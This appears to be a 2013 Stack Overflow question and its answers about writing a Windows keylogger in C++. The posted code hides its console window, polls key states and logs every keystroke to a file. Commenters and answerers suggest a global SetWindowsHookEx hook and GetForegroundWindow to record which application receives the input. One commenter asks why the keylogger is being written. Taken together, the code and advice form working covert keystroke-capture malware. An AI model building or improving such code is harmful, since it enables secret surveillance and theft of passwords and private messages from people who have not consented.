4

I`m trying to write a simple keylogger in C++ using WinAPI. Is there a way to get in which application the user is typing the captured key strokes? And here is my code so far:

#include <iostream>
#include <windows.h>
#include <winuser.h>

using namespace std;

int main()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
    char i;

while (1)
{
    for(i = 8; i <= 190; i++)
    {
        if (GetAsyncKeyState(i) == -32767)
        {
            FILE *OUTPUT_FILE;
            OUTPUT_FILE = fopen("LOG.txt", "a+");
            int c=static_cast<int>(i);
            fprintf(OUTPUT_FILE, "%s", &c);
            fclose (OUTPUT_FILE);
        }
    }
}
system ("PAUSE");
return 0;
}
  • 2
    There's always `GetForegroundWindow`. – chris Mar 13 '13 at 17:50
  • 6
    Why are you making the computer open and close the same file 182 times in a row, as fast as possible? – Nik Bougalis Mar 13 '13 at 17:54
  • 1
    By the way, the correct way to check if a key is down right now is `GetAsyncKeyState(i) & 0x8000`. – chris Mar 13 '13 at 17:59
  • 4
    You should use a keyboard hook via `SetWindowsHookEx()` to monitor keyboard activity, not `GetAsyncKeyState()` in a loop. – Remy Lebeau Mar 13 '13 at 18:01
  • Congratulations. You just wrote the most CPU-consuming program ever. –  Mar 13 '13 at 18:01
  • 1
    @Zoidberg: No, it uses only one thread, so it will at most only use up one core - and it does file-I/O so probably some system calls, locks and stuff in there to slow it down... – Mats Petersson Mar 13 '13 at 18:10
  • @Zoidberg, I already did that for fun when I made something to make another process use all the CPU. – chris Mar 13 '13 at 18:13
  • Why are you writing a keylogger? Perhaps there's a better way to solve your problem than doing something that will probably cause your program to be detected as malware. – Raymond Chen Mar 17 '13 at 23:36

2 Answers2

3

What you want is a global keyboard hook

A global hook monitors messages for all threads in the same desktop as the calling thread. A thread-specific hook monitors messages for only an individual thread. A global hook procedure can be called in the context of any application in the same desktop as the calling thread, so the procedure must be in a separate DLL module. A thread-specific hook procedure is called only in the context of the associated thread. If an application installs a hook procedure for one of its own threads, the hook procedure can be in either the same module as the rest of the application's code or in a DLL. If the application installs a hook procedure for a thread of a different application, the procedure must be in a DLL. For information, see Dynamic-Link Libraries.

user18428
  • 1,216
  • 11
  • 17
0

Since the question is "Is there a way to get in which application the user is typing the captured key strokes?" I'd say use HWND WINAPI GetForegroundWindow(void);

For example:

char cWindow[MAX_PATH];
GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));

In cWindow you get the title of the window in which the user is typing.

Mayhem
  • 396
  • 1
  • 10